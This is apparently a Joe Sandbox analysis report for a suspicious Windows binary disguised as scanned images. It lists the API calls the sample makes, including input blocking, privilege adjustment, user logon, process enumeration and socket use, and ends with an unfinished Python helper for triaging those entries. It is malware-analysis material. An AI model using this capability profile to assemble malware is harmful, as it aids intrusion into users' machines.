                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                        • String ID:
                                                        • API String ID: 1279440585-0
                                                        • Opcode ID: 50fac723adcf0f5df17c98ded2da64131c88c91d39b53a664205bd541bede674
                                                        • Instruction ID: 2a5ea5bd11f2defb745fae3b58804d9808d55f794101b8a1664bc2d4ecfaa8e1
                                                        • Opcode Fuzzy Hash: 50fac723adcf0f5df17c98ded2da64131c88c91d39b53a664205bd541bede674
                                                        • Instruction Fuzzy Hash: 9221CE307002109FCF14EFA8D985B2EB7F9EF49720F108169E95AA72D1CB30AD02CB50
                                                        APIs
                                                          • Part of subcall function 00A40FF6: std::exception::exception.LIBCMT ref: 00A4102C
                                                          • Part of subcall function 00A40FF6: __CxxThrowException@8.LIBCMT ref: 00A41041
                                                        • _memmove.LIBCMT ref: 00A7062F
                                                        • _memmove.LIBCMT ref: 00A70744
                                                        • _memmove.LIBCMT ref: 00A707EB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1300846289-0
                                                        • Opcode ID: 452686da09205bab87954cede6119525e3dc437354d1b3b4787c70378d193b65
                                                        • Instruction ID: 8187f0a3b3d8526559d0dd70dbaa54106bb8ec20b5259a95c046c515e8247d3a
                                                        • Opcode Fuzzy Hash: 452686da09205bab87954cede6119525e3dc437354d1b3b4787c70378d193b65
                                                        • Instruction Fuzzy Hash: CB027FB0E00205DBDF04DF68D981AAEBBB5EF84300F14C069F80ADB295EB35DA55DB91
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00A219FA
                                                        • GetSysColor.USER32(0000000F), ref: 00A21A4E
                                                        • SetBkColor.GDI32(?,00000000), ref: 00A21A61
                                                          • Part of subcall function 00A21290: DefDlgProcW.USER32(?,00000020,?), ref: 00A212D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ColorProc$LongWindow
                                                        • String ID:
                                                        • API String ID: 3744519093-0
                                                        APIs
                                                          • Part of subcall function 00A980A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A980CB
                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A96AB1
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A96ADA
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00A96B13
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A96B20
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00A96B34
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 99427753-0
                                                        Similarity
                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                        • String ID:
                                                        • API String ID: 292994002-0
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00A61D88,?), ref: 00A9C312
                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00A9C324
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                        • API String ID: 2574300362-1816364905
                                                        Similarity
                                                        • API ID: __itow__swprintf
                                                        • String ID:
                                                        • API String ID: 674341424-0
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00A9F151
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00A9F15F
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00A9F21F
                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00A9F22E
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                        • String ID:
                                                        • API String ID: 2576544623-0
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00A840D1
                                                        • _memset.LIBCMT ref: 00A840F2
                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00A84144
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A8414D
                                                        Similarity
                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                        • String ID:
                                                        • API String ID: 1157408455-0
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00A7EB19
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: ($|
                                                        • API String ID: 1659193697-1631851259
                                                        APIs
                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00A926D5
                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00A9270C
                                                        Similarity
                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                        • String ID:
                                                        • API String ID: 599397726-0
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00A8B5AE
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00A8B608
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00A8B655
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID:
                                                        • API String ID: 1682464887-0
                                                        APIs
                                                          • Part of subcall function 00A40FF6: std::exception::exception.LIBCMT ref: 00A4102C
                                                          • Part of subcall function 00A40FF6: __CxxThrowException@8.LIBCMT ref: 00A41041
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A78D0D
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A78D3A
                                                        • GetLastError.KERNEL32 ref: 00A78D47
                                                        Similarity
                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1922334811-0
                                                        APIs
                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A84C2C
                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00A84C43
                                                        • FreeSid.ADVAPI32(?), ref: 00A84C53
                                                        Similarity
                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                        • String ID:
                                                        • API String ID: 3429775523-0
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7121862ba5c95dc8e3665a109eaa737844bb652c51bf8c14e3f656b403d41664
                                                        • Instruction ID: 576681ab32593e2df006561ffb25f339c64381e77d35c0bc3e0ea95ba1e29f8a
                                                        • Opcode Fuzzy Hash: 7121862ba5c95dc8e3665a109eaa737844bb652c51bf8c14e3f656b403d41664
                                                        • Instruction Fuzzy Hash: 0F22AC75A00226CFDB24DF68E580AAEB7F0FF58300F148579E856AB341E735AD85CB91
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00A8C966
                                                        • FindClose.KERNEL32(00000000), ref: 00A8C996
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 52246b81ed5907326b9c5bc566e7f1967dd423c142ab5d8de47c49da7c94cdf1
                                                        • Instruction ID: dd2f8c1e42ce22347057eaea0a7bae7d4ac9b3ee04d3b64189afd27f6290cae2
                                                        • Opcode Fuzzy Hash: 52246b81ed5907326b9c5bc566e7f1967dd423c142ab5d8de47c49da7c94cdf1
                                                        • Instruction Fuzzy Hash: BE11A5316006109FD710EF69D845A2BF7E5FF45320F00895EF8A9D7291DB30AC05CB91
                                                        APIs
                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00A9977D,?,00AAFB84,?), ref: 00A8A302
                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00A9977D,?,00AAFB84,?), ref: 00A8A314
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ErrorFormatLastMessage
                                                        • String ID:
                                                        • API String ID: 3479602957-0
                                                        • Opcode ID: d17210ed6c6060dc066614ba9f37acef0391ceded6eb719a170af7a95ae7e3a1
                                                        • Instruction ID: ad461d0624ab78a34e4b35214d180fcca4cc6231fdb0ef71dfa6441bce55db02
                                                        • Opcode Fuzzy Hash: d17210ed6c6060dc066614ba9f37acef0391ceded6eb719a170af7a95ae7e3a1
                                                        • Instruction Fuzzy Hash: 67F0823564422DBBEB10AFE4CC48FEA776DFF09762F008166B918D6181D7309944CBE1
                                                        APIs
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A78851), ref: 00A78728
                                                        • CloseHandle.KERNEL32(?,?,00A78851), ref: 00A7873A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                        • String ID:
                                                        • API String ID: 81990902-0
                                                        • Opcode ID: 6c2f0013a45377340783ad35e6fe6ff1a62e4d2528ec4ff29e366eed1f7e325b
                                                        • Instruction ID: 16a86c4a3960377b271d054742d95c6290f0e381009eee3cd5f778f4ee2b6d3c
                                                        • Opcode Fuzzy Hash: 6c2f0013a45377340783ad35e6fe6ff1a62e4d2528ec4ff29e366eed1f7e325b
                                                        • Instruction Fuzzy Hash: 55E0B676010651EEEB292BA0ED09D777BA9EB45350724893DB89684470DB62ACD1DB10
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A48F97,?,?,?,00000001), ref: 00A4A39A
                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00A4A3A3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 280f1ed997234b952649a9aa20c09c3b3002bda39a032a0ee4ce1020b20028a5
                                                        • Instruction ID: c1342b5109a85b31bac6fcd3f63a1dc0df92655c397672652a0ca06decb4f512
                                                        • Opcode Fuzzy Hash: 280f1ed997234b952649a9aa20c09c3b3002bda39a032a0ee4ce1020b20028a5
                                                        • Instruction Fuzzy Hash: 2CB0923105420AAFCF046BD1EC59B883F68EB46AA2F404020F61D880A0CBA354528AA1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 46b26d64afd41da39374a35bb69675ba4c8f8f3c2366f956e8bb31b8feb58fdb
                                                        • Instruction ID: 1291c5082e1b4026fa144ce01cafbfd1c2c64478000db59d13399bbf6904d0f0
                                                        • Opcode Fuzzy Hash: 46b26d64afd41da39374a35bb69675ba4c8f8f3c2366f956e8bb31b8feb58fdb
                                                        • Instruction Fuzzy Hash: 68320526D69F414DDB239635D872339A289EFF73C4F15E737E81AB59A6EB28C4834100
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 662808191709e77147ac6343e36fe2057b9e5dab1143d11a81a4c8325b164c22
                                                        • Instruction ID: 03192f3cae361feaeb8b5f3af00820d6000ed6f66e81bbad6857bd01699d3e0e
                                                        • Opcode Fuzzy Hash: 662808191709e77147ac6343e36fe2057b9e5dab1143d11a81a4c8325b164c22
                                                        • Instruction Fuzzy Hash: 0EB1EF21E2AF414DD72396798831336BA9CAFBB2D5F52D71BFC2674D32EB2185834241
                                                        APIs
                                                        • __time64.LIBCMT ref: 00A88B25
                                                          • Part of subcall function 00A4543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00A891F8,00000000,?,?,?,?,00A893A9,00000000,?), ref: 00A45443
                                                          • Part of subcall function 00A4543A: __aulldiv.LIBCMT ref: 00A45463
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                        • String ID:
                                                        • API String ID: 2893107130-0
                                                        • Opcode ID: 0e6b6ee58669afbb54142d751e1e074a3481264e4c028e15ed0d755ed776e15f
                                                        • Instruction ID: c19b2fb4b93d79c9502c24ea6a9c2429b284608b164070c81d84802c2bb0a2ea
                                                        • Opcode Fuzzy Hash: 0e6b6ee58669afbb54142d751e1e074a3481264e4c028e15ed0d755ed776e15f
                                                        • Instruction Fuzzy Hash: 5321E4726356108BC729CF65D441A56B3E1EFA4311B688E6CD0E5CF2D0CE34BD05CB94
                                                        APIs
                                                        • BlockInput.USER32(00000001), ref: 00A94218
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: BlockInput
                                                        • String ID:
                                                        • API String ID: 3456056419-0
                                                        • Opcode ID: e70cbfe418dc99d5b8290d4176cbff612c4e454c58d63def63a9e436522dd338
                                                        • Instruction ID: 4922ba540b2be473bf80aa60e75ac118a7a4c5c3fdb49b37c3434b62da05f9a8
                                                        • Opcode Fuzzy Hash: e70cbfe418dc99d5b8290d4176cbff612c4e454c58d63def63a9e436522dd338
                                                        • Instruction Fuzzy Hash: EEE04F313402149FDB10EF99E945E9BF7E8AF9C7A0F008026FC49C7352DA70E8428BA0
                                                        APIs
                                                        • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00A84F18
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: mouse_event
                                                        • String ID:
                                                        • API String ID: 2434400541-0
                                                        • Opcode ID: 28d35b3bdcbe352593286fca90f2b6fb228b57720b41fe9375f3908c69922a7d
                                                        • Instruction ID: 0260d5dcaf161f08a9a6af5d7dca6321e7254deb4f17a1bd4f3e1b680d9ff51f
                                                        • Opcode Fuzzy Hash: 28d35b3bdcbe352593286fca90f2b6fb228b57720b41fe9375f3908c69922a7d
                                                        • Instruction Fuzzy Hash: A4D05EB09642073CFC1CAB20AC0FF761508F348F81F84498D3341854C1AAE56C00A234
                                                        APIs
                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00A788D1), ref: 00A78CB3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: LogonUser
                                                        • String ID:
                                                        • API String ID: 1244722697-0
                                                        • Opcode ID: 787855316126020814b36a92e220d58eada5678095b6c87626c3034ace89dc28
                                                        • Instruction ID: b19d34434eacfb981d5c189e14508026925557468d155c58e45616d4e152cc9a
                                                        • Opcode Fuzzy Hash: 787855316126020814b36a92e220d58eada5678095b6c87626c3034ace89dc28
                                                        • Instruction Fuzzy Hash: D7D05E322A050EAFEF018EA4DC01EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                        APIs
                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00A62242
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: NameUser
                                                        • String ID:
                                                        • API String ID: 2645101109-0
                                                        • Opcode ID: d02d6873bd4fa918335dfda4092cca06a529c4461b44101b8e631895ffa15787
                                                        • Instruction ID: 5acac4a741cad3b1be94b18caa286d3f9f66d218425346107f16f70a9eca9b06
                                                        • Opcode Fuzzy Hash: d02d6873bd4fa918335dfda4092cca06a529c4461b44101b8e631895ffa15787
                                                        • Instruction Fuzzy Hash: D9C048F180010ADBDB09DBE0DA88DEEBBBCEB08305F2440A6A142F2140E7749B448A71
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00A4A36A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 3e1072d3e39af04c748b74a5bffb54f6644bc78c03312e292b0895f86763f4ce
                                                        • Instruction ID: 9706c4beb908137a175dbf5c2b711b021811e2829ba81865825431af36df7d92
                                                        • Opcode Fuzzy Hash: 3e1072d3e39af04c748b74a5bffb54f6644bc78c03312e292b0895f86763f4ce
                                                        • Instruction Fuzzy Hash: 2DA0123000010DAB8F001BC1EC044447F5CD6011907004020F40C44021873354114590
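The "APIs" entries above list one resolved import per line in a fixed shape (`Name.MODULE(args), ref: VA`), with `?` standing for argument values the sandbox could not resolve. The following is an added triage helper written for this page; it is not part of the Joe Sandbox report and Joe Sandbox does not ship it. It parses that shape, rebases each `ref` against the image base given in the Memory Dump Source entries (`Offset: 00A20000`) so the addresses can be followed in a disassembler loaded at a different base, decodes the two first arguments whose meaning is unambiguous (`BlockInput(1)` and the `mouse_event` flag word), and flags the calls a reverser would open first. The sample input is copied from the API lines of this section; the watch-list notes are the editor's, not the report's. Treat the flags as pointers into the disassembly rather than verdicts: in a binary whose native code is an interpreter runtime (a compiled AutoIt stub, for instance), `BlockInput`, `mouse_event`, `LogonUserW` and `AdjustTokenPrivileges` are the interpreter's built-in functions and appear in the function table whether or not the embedded script ever calls them.

```python
"""Triage helper for the 'APIs' entries of a Joe Sandbox function table.

Added example for this page; not part of the report or of Joe Sandbox.
Parses lines such as
    • BlockInput.USER32(00000001), ref: 00A94218
into (api, module, args, ref), rebases ref to an RVA and flags calls of interest.
"""
import re
from typing import Dict, List, Optional

# 'Offset: 00A20000' from the Memory Dump Source entries of this report.
IMAGE_BASE = 0x00A20000

# Constructed sample: API lines copied from the function table above.
SAMPLE_REPORT = """\
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00A8C966
• FindClose.KERNEL32(00000000), ref: 00A8C996
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00A9977D,?,00AAFB84,?), ref: 00A8A302
• FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00A9977D,?,00AAFB84,?), ref: 00A8A314
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A78851), ref: 00A78728
• CloseHandle.KERNEL32(?,?,00A78851), ref: 00A7873A
APIs
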